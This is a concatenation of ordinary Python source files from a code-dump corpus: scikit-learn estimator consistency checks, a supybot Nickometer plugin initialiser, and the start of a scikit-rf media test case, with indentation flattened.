"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
X_pred, X_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
# raises error on malformed input for transform
if hasattr(X, 'T'):
# If it's not an array, it does not have a 'T' property
assert_raises(ValueError, transformer.transform, X.T)
@ignore_warnings
def check_pipeline_consistency(name, Estimator):
if name in ('CCA', 'LocallyLinearEmbedding', 'KernelPCA') and _is_32bit():
# Those transformers yield non-deterministic output when executed on
# a 32bit Python. The same transformers are stable on 64bit Python.
# FIXME: try to isolate a minimalistic reproduction case only depending
        # on numpy & scipy and/or maybe generate a test dataset that does not
# cause such unstable behaviors.
msg = name + ' is non deterministic on 32bit Python'
raise SkipTest(msg)
# check that make_pipeline(est) gives same score as est
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X -= X.min()
y = multioutput_estimator_convert_y_2d(name, y)
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
pipeline = make_pipeline(estimator)
estimator.fit(X, y)
pipeline.fit(X, y)
funcs = ["score", "fit_transform"]
for func_name in funcs:
func = getattr(estimator, func_name, None)
if func is not None:
func_pipeline = getattr(pipeline, func_name)
result = func(X, y)
result_pipe = func_pipeline(X, y)
assert_array_almost_equal(result, result_pipe)
@ignore_warnings
def check_fit_score_takes_y(name, Estimator):
# check that all estimators accept an optional y
# in fit and score so they can be used in pipelines
rnd = np.random.RandomState(0)
X = rnd.uniform(size=(10, 3))
y = np.arange(10) % 3
y = multioutput_estimator_convert_y_2d(name, y)
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
funcs = ["fit", "score", "partial_fit", "fit_predict", "fit_transform"]
for func_name in funcs:
func = getattr(estimator, func_name, None)
if func is not None:
func(X, y)
args = inspect.getargspec(func).args
assert_true(args[2] in ["y", "Y"])
@ignore_warnings
def check_estimators_dtypes(name, Estimator):
rnd = np.random.RandomState(0)
X_train_32 = 3 * rnd.uniform(size=(20, 5)).astype(np.float32)
X_train_64 = X_train_32.astype(np.float64)
X_train_int_64 = X_train_32.astype(np.int64)
X_train_int_32 = X_train_32.astype(np.int32)
y = X_train_int_64[:, 0]
y = multioutput_estimator_convert_y_2d(name, y)
for X_train in [X_train_32, X_train_64, X_train_int_64, X_train_int_32]:
with warnings.catch_warnings(record=True):
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator, 1)
estimator.fit(X_train, y)
for method in ["predict", "transform", "decision_function",
"predict_proba"]:
if hasattr(estimator, method):
getattr(estimator, method)(X_train)
def check_estimators_empty_data_messages(name, Estimator):
e = Estimator()
set_fast_parameters(e)
set_random_state(e, 1)
X_zero_samples = np.empty(0).reshape(0, 3)
# The precise message can change depending on whether X or y is
# validated first. Let us test the type of exception only:
assert_raises(ValueError, e.fit, X_zero_samples, [])
X_zero_features = np.empty(0).reshape(3, 0)
# the following y should be accepted by both classifiers and regressors
# and ignored by unsupervised models
y = multioutput_estimator_convert_y_2d(name, np.array([1, 0, 1]))
msg = "0 feature(s) (shape=(3, 0)) while a minimum of 1 is required."
assert_raise_message(ValueError, msg, e.fit, X_zero_features, y)
def check_estimators_nan_inf(name, Estimator):
rnd = np.random.RandomState(0)
X_train_finite = rnd.uniform(size=(10, 3))
X_train_nan = rnd.uniform(size=(10, 3))
X_train_nan[0, 0] = np.nan
X_train_inf = rnd.uniform(size=(10, 3))
X_train_inf[0, 0] = np.inf
y = np.ones(10)
y[:5] = 0
y = multioutput_estimator_convert_y_2d(name, y)
error_string_fit = "Estimator doesn't check for NaN and inf in fit."
error_string_predict = ("Estimator doesn't check for NaN and inf in"
" predict.")
error_string_transform = ("Estimator doesn't check for NaN and inf in"
" transform.")
for X_train in [X_train_nan, X_train_inf]:
# catch deprecation warnings
with warnings.catch_warnings(record=True):
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator, 1)
# try to fit
try:
estimator.fit(X_train, y)
except ValueError as e:
if 'inf' not in repr(e) and 'NaN' not in repr(e):
print(error_string_fit, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_fit, Estimator, exc)
traceback.print_exc(file=sys.stdout)
raise exc
else:
raise AssertionError(error_string_fit, Estimator)
# actually fit
estimator.fit(X_train_finite, y)
# predict
if hasattr(estimator, "predict"):
try:
estimator.predict(X_train)
except ValueError as e:
if 'inf' not in repr(e) and 'NaN' not in repr(e):
print(error_string_predict, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_predict, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_predict, Estimator)
# transform
if hasattr(estimator, "transform"):
try:
estimator.transform(X_train)
except ValueError as e:
if 'inf' not in repr(e) and 'NaN' not in repr(e):
print(error_string_transform, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_transform, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_transform, Estimator)
def check_transformer_pickle(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
n_samples, n_features = X.shape
X = StandardScaler().fit_transform(X)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
if not hasattr(transformer, 'transform'):
return
set_random_state(transformer)
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
random_state = np.random.RandomState(seed=12345)
y_ = np.vstack([y, 2 * y + random_state.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit(X, y_).transform(X)
pickled_transformer = pickle.dumps(transformer)
unpickled_transformer = pickle.loads(pickled_transformer)
pickled_X_pred = unpickled_transformer.transform(X)
assert_array_almost_equal(pickled_X_pred, X_pred)
def check_estimators_partial_fit_n_features(name, Alg):
    # check that an error is raised if the number of features changes
    # between calls to partial_fit.
if not hasattr(Alg, 'partial_fit'):
return
X, y = make_blobs(n_samples=50, random_state=1)
X -= X.min()
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if isinstance(alg, ClassifierMixin):
classes = np.unique(y)
alg.partial_fit(X, y, classes=classes)
else:
alg.partial_fit(X, y)
assert_raises(ValueError, alg.partial_fit, X[:, :-1], y)
def check_clustering(name, Alg):
X, y = make_blobs(n_samples=50, random_state=1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
n_samples, n_features = X.shape
# catch deprecation and neighbors warnings
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if hasattr(alg, "n_clusters"):
alg.set_params(n_clusters=3)
set_random_state(alg)
if name == 'AffinityPropagation':
alg.set_params(preference=-100)
alg.set_params(max_iter=100)
# fit
alg.fit(X)
# with lists
alg.fit(X.tolist())
assert_equal(alg.labels_.shape, (n_samples,))
pred = alg.labels_
assert_greater(adjusted_rand_score(pred, y), 0.4)
# fit another time with ``fit_predict`` and compare results
        if name == 'SpectralClustering':
# there is no way to make Spectral clustering deterministic :(
return
set_random_state(alg)
with warnings.catch_warnings(record=True):
pred2 = alg.fit_predict(X)
assert_array_equal(pred, pred2)
def check_clusterer_compute_labels_predict(name, Clusterer):
"""Check that predict is invariant of compute_labels"""
X, y = make_blobs(n_samples=20, random_state=0)
clusterer = Clusterer()
if hasattr(clusterer, "compute_labels"):
# MiniBatchKMeans
if hasattr(clusterer, "random_state"):
clusterer.set_params(random_state=0)
X_pred1 = clusterer.fit(X).predict(X)
clusterer.set_params(compute_labels=False)
X_pred2 = clusterer.fit(X).predict(X)
assert_array_equal(X_pred1, X_pred2)
def check_classifiers_one_label(name, Classifier):
error_string_fit = "Classifier can't train when only one class is present."
error_string_predict = ("Classifier can't predict when only one class is "
"present.")
rnd = np.random.RandomState(0)
X_train = rnd.uniform(size=(10, 3))
X_test = rnd.uniform(size=(10, 3))
y = np.ones(10)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# try to fit
try:
classifier.fit(X_train, y)
except ValueError as e:
if 'class' not in repr(e):
print(error_string_fit, Classifier, e)
traceback.print_exc(file=sys.stdout)
raise e
else:
return
except Exception as exc:
print(error_string_fit, Classifier, exc)
traceback.print_exc(file=sys.stdout)
raise exc
# predict
try:
assert_array_equal(classifier.predict(X_test), y)
except Exception as exc:
print(error_string_predict, Classifier, exc)
raise exc
def check_classifiers_train(name, Classifier):
X_m, y_m = make_blobs(random_state=0)
X_m, y_m = shuffle(X_m, y_m, random_state=7)
X_m = StandardScaler().fit_transform(X_m)
# generate binary problem from multi-class one
y_b = y_m[y_m != 2]
X_b = X_m[y_m != 2]
for (X, y) in [(X_m, y_m), (X_b, y_b)]:
# catch deprecation warnings
classes = np.unique(y)
n_classes = len(classes)
n_samples, n_features = X.shape
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name in ['BernoulliNB', 'MultinomialNB']:
X -= X.min()
set_fast_parameters(classifier)
set_random_state(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
# with lists
classifier.fit(X.tolist(), y.tolist())
assert_true(hasattr(classifier, "classes_"))
y_pred = classifier.predict(X)
assert_equal(y_pred.shape, (n_samples,))
# training set performance
if name not in ['BernoulliNB', 'MultinomialNB']:
assert_greater(accuracy_score(y, y_pred), 0.83)
# raises error on malformed input for predict
assert_raises(ValueError, classifier.predict, X.T)
if hasattr(classifier, "decision_function"):
try:
# decision_function agrees with predict
decision = classifier.decision_function(X)
                if n_classes == 2:
assert_equal(decision.shape, (n_samples,))
dec_pred = (decision.ravel() > 0).astype(np.int)
assert_array_equal(dec_pred, y_pred)
                if (n_classes == 3
and not isinstance(classifier, BaseLibSVM)):
# 1on1 of LibSVM works differently
assert_equal(decision.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(decision, axis=1), y_pred)
# raises error on malformed input
assert_raises(ValueError,
classifier.decision_function, X.T)
# raises error on malformed input for decision_function
assert_raises(ValueError,
classifier.decision_function, X.T)
except NotImplementedError:
pass
if hasattr(classifier, "predict_proba"):
# predict_proba agrees with predict
y_prob = classifier.predict_proba(X)
assert_equal(y_prob.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(y_prob, axis=1), y_pred)
# check that probas for all classes sum to one
assert_array_almost_equal(np.sum(y_prob, axis=1),
np.ones(n_samples))
# raises error on malformed input
assert_raises(ValueError, classifier.predict_proba, X.T)
# raises error on malformed input for predict_proba
assert_raises(ValueError, classifier.predict_proba, X.T)
def check_estimators_fit_returns_self(name, Estimator):
"""Check if self is returned when calling fit"""
X, y = make_blobs(random_state=0, n_samples=9, n_features=4)
y = multioutput_estimator_convert_y_2d(name, y)
# some want non-negative input
X -= X.min()
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
assert_true(estimator.fit(X, y) is estimator)
@ignore_warnings
def check_estimators_unfitted(name, Estimator):
"""Check that predict raises an exception in an unfitted estimator.
Unfitted estimators should raise either AttributeError or ValueError.
The specific exception type NotFittedError inherits from both and can
therefore be adequately raised for that purpose.
"""
# Common test for Regressors as well as Classifiers
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
est = Estimator()
msg = "fit"
if hasattr(est, 'predict'):
assert_raise_message((AttributeError, ValueError), msg,
est.predict, X)
if hasattr(est, 'decision_function'):
assert_raise_message((AttributeError, ValueError), msg,
est.decision_function, X)
if hasattr(est, 'predict_proba'):
assert_raise_message((AttributeError, ValueError), msg,
est.predict_proba, X)
if hasattr(est, 'predict_log_proba'):
assert_raise_message((AttributeError, ValueError), msg,
est.predict_log_proba, X)
def check_classifiers_input_shapes(name, Classifier):
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=1)
X = StandardScaler().fit_transform(X)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
set_random_state(classifier)
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
set_random_state(classifier)
# Check that when a 2D y is given, a DataConversionWarning is
# raised
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DataConversionWarning)
warnings.simplefilter("ignore", RuntimeWarning)
classifier.fit(X, y[:, np.newaxis])
msg = "expected 1 DataConversionWarning, got: %s" % (
", ".join([str(w_x) for w_x in w]))
assert_equal(len(w), 1, msg)
assert_array_equal(y_pred, classifier.predict(X))
def check_classifiers_classes(name, Classifier):
X, y = make_blobs(n_samples=30, random_state=0, cluster_std=0.1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
    # We need to make sure that we have non-negative data, for things
# like NMF
X -= X.min() - .1
y_names = np.array(["one", "two", "three"])[y]
for y_names in [y_names, y_names.astype('O')]:
if name in ["LabelPropagation", "LabelSpreading"]:
# TODO some complication with -1 label
y_ = y
else:
y_ = y_names
classes = np.unique(y_)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name == 'BernoulliNB':
classifier.set_params(binarize=X.mean())
set_fast_parameters(classifier)
set_random_state(classifier)
# fit
classifier.fit(X, y_)
y_pred = classifier.predict(X)
# training set performance
assert_array_equal(np.unique(y_), np.unique(y_pred))
if np.any(classifier.classes_ != classes):
print("Unexpected classes_ attribute for %r: "
"expected %s, got %s" %
(classifier, classes, classifier.classes_))
def check_classifiers_pickle(name, Classifier):
X, y = make_blobs(random_state=0)
X, y = shuffle(X, y, random_state=7)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
pickled_classifier = pickle.dumps(classifier)
unpickled_classifier = pickle.loads(pickled_classifier)
pickled_y_pred = unpickled_classifier.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
def check_regressors_int(name, Regressor):
X, _ = _boston_subset()
X = X[:50]
rnd = np.random.RandomState(0)
y = rnd.randint(3, size=X.shape[0])
y = multioutput_estimator_convert_y_2d(name, y)
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
regressor_1 = Regressor()
regressor_2 = Regressor()
set_fast_parameters(regressor_1)
set_fast_parameters(regressor_2)
set_random_state(regressor_1)
set_random_state(regressor_2)
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
# fit
regressor_1.fit(X, y_)
pred1 = regressor_1.predict(X)
regressor_2.fit(X, y_.astype(np.float))
pred2 = regressor_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_regressors_train(name, Regressor):
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
if name == 'PassiveAggressiveRegressor':
regressor.C = 0.01
# raises error on malformed input for fit
assert_raises(ValueError, regressor.fit, X, y[:-1])
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
set_random_state(regressor)
regressor.fit(X, y_)
regressor.fit(X.tolist(), y_.tolist())
y_pred = regressor.predict(X)
assert_equal(y_pred.shape, y_.shape)
# TODO: find out why PLS and CCA fail. RANSAC is random
# and furthermore assumes the presence of outliers, hence
# skipped
if name not in ('PLSCanonical', 'CCA', 'RANSACRegressor'):
print(regressor)
assert_greater(regressor.score(X, y_), 0.5)
def check_regressors_pickle(name, Regressor):
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
regressor.fit(X, y_)
y_pred = regressor.predict(X)
# store old predictions
pickled_regressor = pickle.dumps(regressor)
unpickled_regressor = pickle.loads(pickled_regressor)
pickled_y_pred = unpickled_regressor.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
@ignore_warnings
def check_regressors_no_decision_function(name, Regressor):
# checks whether regressors have decision_function or predict_proba
rng = np.random.RandomState(0)
X = rng.normal(size=(10, 4))
y = multioutput_estimator_convert_y_2d(name, X[:, 0])
regressor = Regressor()
set_fast_parameters(regressor)
if hasattr(regressor, "n_components"):
# FIXME CCA, PLS is not robust to rank 1 effects
regressor.n_components = 1
regressor.fit(X, y)
funcs = ["decision_function", "predict_proba", "predict_log_proba"]
for func_name in funcs:
func = getattr(regressor, func_name, None)
if func is None:
# doesn't have function
continue
# has function. Should raise deprecation warning
msg = func_name
assert_warns_message(DeprecationWarning, msg, func, X)
def check_class_weight_classifiers(name, Classifier):
if name == "NuSVC":
# the sparse version has a parameter that doesn't do anything
raise SkipTest
if name.endswith("NB"):
# NaiveBayes classifiers have a somewhat different interface.
# FIXME SOON!
raise SkipTest
for n_centers in [2, 3]:
# create a very noisy dataset
X, y = make_blobs(centers=n_centers, random_state=0, cluster_std=20)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5,
random_state=0)
n_centers = len(np.unique(y_train))
if n_centers == 2:
class_weight = {0: 1000, 1: 0.0001}
else:
class_weight = {0: 1000, 1: 0.0001, 2: 0.0001}
with warnings.catch_warnings(record=True):
classifier = Classifier(class_weight=class_weight)
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
if hasattr(classifier, "min_weight_fraction_leaf"):
classifier.set_params(min_weight_fraction_leaf=0.01)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
assert_greater(np.mean(y_pred == 0), 0.89)
def check_class_weight_balanced_classifiers(name, Classifier, X_train, y_train,
X_test, y_test, weights):
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
classifier.set_params(class_weight='balanced')
classifier.fit(X_train, y_train)
y_pred_balanced = classifier.predict(X_test)
assert_greater(f1_score(y_test, y_pred_balanced, average='weighted'),
f1_score(y_test, y_pred, average='weighted'))
def check_class_weight_balanced_linear_classifier(name, Classifier):
"""Test class weights with non-contiguous class labels."""
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = np.array([1, 1, 1, -1, -1])
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
# This is a very small dataset, default n_iter are likely to prevent
# convergence
classifier.set_params(n_iter=1000)
set_random_state(classifier)
# Let the model compute the class frequencies
classifier.set_params(class_weight='balanced')
coef_balanced = classifier.fit(X, y).coef_.copy()
# Count each label occurrence to reweight manually
n_samples = len(y)
n_classes = float(len(np.unique(y)))
class_weight = {1: n_samples / (np.sum(y == 1) * n_classes),
-1: n_samples / (np.sum(y == -1) * n_classes)}
classifier.set_params(class_weight=class_weight)
coef_manual = classifier.fit(X, y).coef_.copy()
assert_array_almost_equal(coef_balanced, coef_manual)
def check_estimators_overwrite_params(name, Estimator):
X, y = make_blobs(random_state=0, n_samples=9)
y = multioutput_estimator_convert_y_2d(name, y)
# some want non-negative input
X -= X.min()
with warnings.catch_warnings(record=True):
# catch deprecation warnings
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
    # Make a physical copy of the original estimator parameters before fitting.
params = estimator.get_params()
original_params = deepcopy(params)
# Fit the model
estimator.fit(X, y)
# Compare the state of the model parameters with the original parameters
new_params = estimator.get_params()
for param_name, original_value in original_params.items():
new_value = new_params[param_name]
# We should never change or mutate the internal state of input
# parameters by default. To check this we use the joblib.hash function
# that introspects recursively any subobjects to compute a checksum.
# The only exception to this rule of immutable constructor parameters
# is possible RandomState instance but in this check we explicitly
# fixed the random_state params recursively to be integer seeds.
assert_equal(hash(new_value), hash(original_value),
"Estimator %s should not change or mutate "
" the parameter %s from %s to %s during fit."
% (name, param_name, original_value, new_value))
def check_sparsify_coefficients(name, Estimator):
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1],
[-1, -2], [2, 2], [-2, -2]])
y = [1, 1, 1, 2, 2, 2, 3, 3, 3]
est = Estimator()
est.fit(X, y)
pred_orig = est.predict(X)
# test sparsify with dense inputs
est.sparsify()
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
# pickle and unpickle with sparse coef_
est = pickle.loads(pickle.dumps(est))
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
def check_classifier_data_not_an_array(name, Estimator):
X = np.array([[3, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 1]])
y = [1, 1, 1, 2, 2, 2]
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_regressor_data_not_an_array(name, Estimator):
X, y = _boston_subset(n_samples=50)
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_estimators_data_not_an_array(name, Estimator, X, y):
if name in CROSS_DECOMPOSITION:
raise SkipTest
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
estimator_1 = Estimator()
estimator_2 = Estimator()
set_fast_parameters(estimator_1)
set_fast_parameters(estimator_2)
set_random_state(estimator_1)
set_random_state(estimator_2)
y_ = NotAnArray(np.asarray(y))
X_ = NotAnArray(np.asarray(X))
# fit
estimator_1.fit(X_, y_)
pred1 = estimator_1.predict(X_)
estimator_2.fit(X, y)
pred2 = estimator_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_parameters_default_constructible(name, Estimator):
classifier = LDA()
# test default-constructibility
# get rid of deprecation warnings
with warnings.catch_warnings(record=True):
if name in META_ESTIMATORS:
estimator = Estimator(classifier)
else:
estimator = Estimator()
# test cloning
clone(estimator)
# test __repr__
repr(estimator)
# test that set_params returns self
assert_true(estimator.set_params() is estimator)
# test if init does nothing but set parameters
# this is important for grid_search etc.
# We get the default parameters from init and then
# compare these against the actual values of the attributes.
# this comes from getattr. Gets rid of deprecation decorator.
init = getattr(estimator.__init__, 'deprecated_original',
estimator.__init__)
try:
args, varargs, kws, defaults = inspect.getargspec(init)
except TypeError:
# init is not a python function.
# true for mixins
return
params = estimator.get_params()
if name in META_ESTIMATORS:
# they need a non-default argument
args = args[2:]
else:
args = args[1:]
if args:
# non-empty list
assert_equal(len(args), len(defaults))
else:
return
for arg, default in zip(args, defaults):
assert_in(type(default), [str, int, float, bool, tuple, type(None),
np.float64, types.FunctionType, Memory])
if arg not in params.keys():
# deprecated parameter, not in get_params
assert_true(default is None)
continue
if isinstance(params[arg], np.ndarray):
assert_array_equal(params[arg], default)
else:
assert_equal(params[arg], default)
def multioutput_estimator_convert_y_2d(name, y):
    # Estimators in mono_output_task_error raise ValueError if y is 1-D.
# Convert into a 2-D y for those estimators.
if name in (['MultiTaskElasticNetCV', 'MultiTaskLassoCV',
'MultiTaskLasso', 'MultiTaskElasticNet']):
return y[:, np.newaxis]
return y
def check_non_transformer_estimators_n_iter(name, estimator,
multi_output=False):
    # Check that all iterative solvers run for more than one iteration.
iris = load_iris()
X, y_ = iris.data, iris.target
if multi_output:
y_ = y_[:, np.newaxis]
set_random_state(estimator, 0)
if name == 'AffinityPropagation':
estimator.fit(X)
else:
estimator.fit(X, y_)
assert_greater(estimator.n_iter_, 0)
def check_transformer_n_iter(name, estimator):
if name in CROSS_DECOMPOSITION:
# Check using default data
X = [[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]]
y_ = [[0.1, -0.2], [0.9, 1.1], [0.1, -0.5], [0.3, -0.2]]
else:
X, y_ = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X -= X.min() - 0.1
set_random_state(estimator, 0)
estimator.fit(X, y_)
# These return a n_iter per component.
if name in CROSS_DECOMPOSITION:
for iter_ in estimator.n_iter_:
assert_greater(iter_, 1)
else:
assert_greater(estimator.n_iter_, 1)
def check_get_params_invariance(name, estimator):
class T(BaseEstimator):
"""Mock classifier
"""
def __init__(self):
pass
def fit(self, X, y):
return self
if name in ('FeatureUnion', 'Pipeline'):
e = estimator([('clf', T())])
    elif name in ('GridSearchCV', 'RandomizedSearchCV'):
return
else:
e = estimator()
shallow_params = e.get_params(deep=False)
deep_params = e.get_params(deep=True)
assert_true(all(item in deep_params.items() for item in
shallow_params.items()))
|
jeffmahoney/supybot
|
refs/heads/urlsnarfer
|
plugins/Nickometer/__init__.py
|
15
|
###
# Copyright (c) 2004, William Robinson.
# Derived from work (c) 1998, Adam Spiers <adam.spiers@new.ox.ac.uk>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
###
# This algorithm is almost a direct port of the perl nickometer from
# blootbot. Hardly any of the original code has been used, though I have
# copy-pasted most of the comments. As a matter of courtesy, the original copyright
# message follows:
#
# #
# # Lame-o-Nickometer backend
# #
# # (c) 1998 Adam Spiers <adam.spiers@new.ox.ac.uk>
# #
# # You may do whatever you want with this code, but give me credit.
# #
# # $Id: Nickometer.py,v 1.13 2004/10/22 22:19:30 jamessan Exp $
# #
###
"""
A port of Infobot's nickometer command from Perl. This plugin
provides one command (called nickometer) which will tell you how 'lame'
an IRC nick is. It's an elitist hacker thing, but quite fun.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you're keeping the plugin in CVS or some similar system.
__version__ = ""
# XXX Replace this with an appropriate author or supybot.Author instance.
__author__ = supybot.authors.baggins
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {}
import config
import plugin
reload(plugin) # In case we're being reloaded.
# Add more reloads here if you add third-party modules and want them to be
# reloaded when this plugin is reloaded. Don't forget to import them as well!
if world.testing:
import test
Class = plugin.Class
configure = config.configure
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
aerialist/scikit-rf
|
refs/heads/master
|
skrf/media/tests/test_media.py
|
6
|
import unittest
import os
import numpy as npy
from skrf.media import DefinedGammaZ0, Media
from skrf.network import Network
from skrf.frequency import Frequency
import skrf
class DefinedGammaZ0TestCase(unittest.TestCase):
def setUp(self):
self.files_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'qucs_prj'
)
self.dummy_media = DefinedGammaZ0(
frequency = Frequency(1,100,21,'ghz'),
gamma=1j,
z0 = 50 ,
)
def test_impedance_mismatch(self):
'''
'''
fname = os.path.join(self.files_dir,\
'impedanceMismatch,50to25.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.thru(z0=50)**\
self.dummy_media.thru(z0=25)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_resistor(self):
'''
'''
fname = os.path.join(self.files_dir,\
'resistor,1ohm.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.resistor(1)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_capacitor(self):
'''
'''
fname = os.path.join(self.files_dir,\
'capacitor,p01pF.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.capacitor(.01e-12)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_inductor(self):
'''
'''
fname = os.path.join(self.files_dir,\
'inductor,p1nH.s2p')
qucs_ntwk = Network(fname)
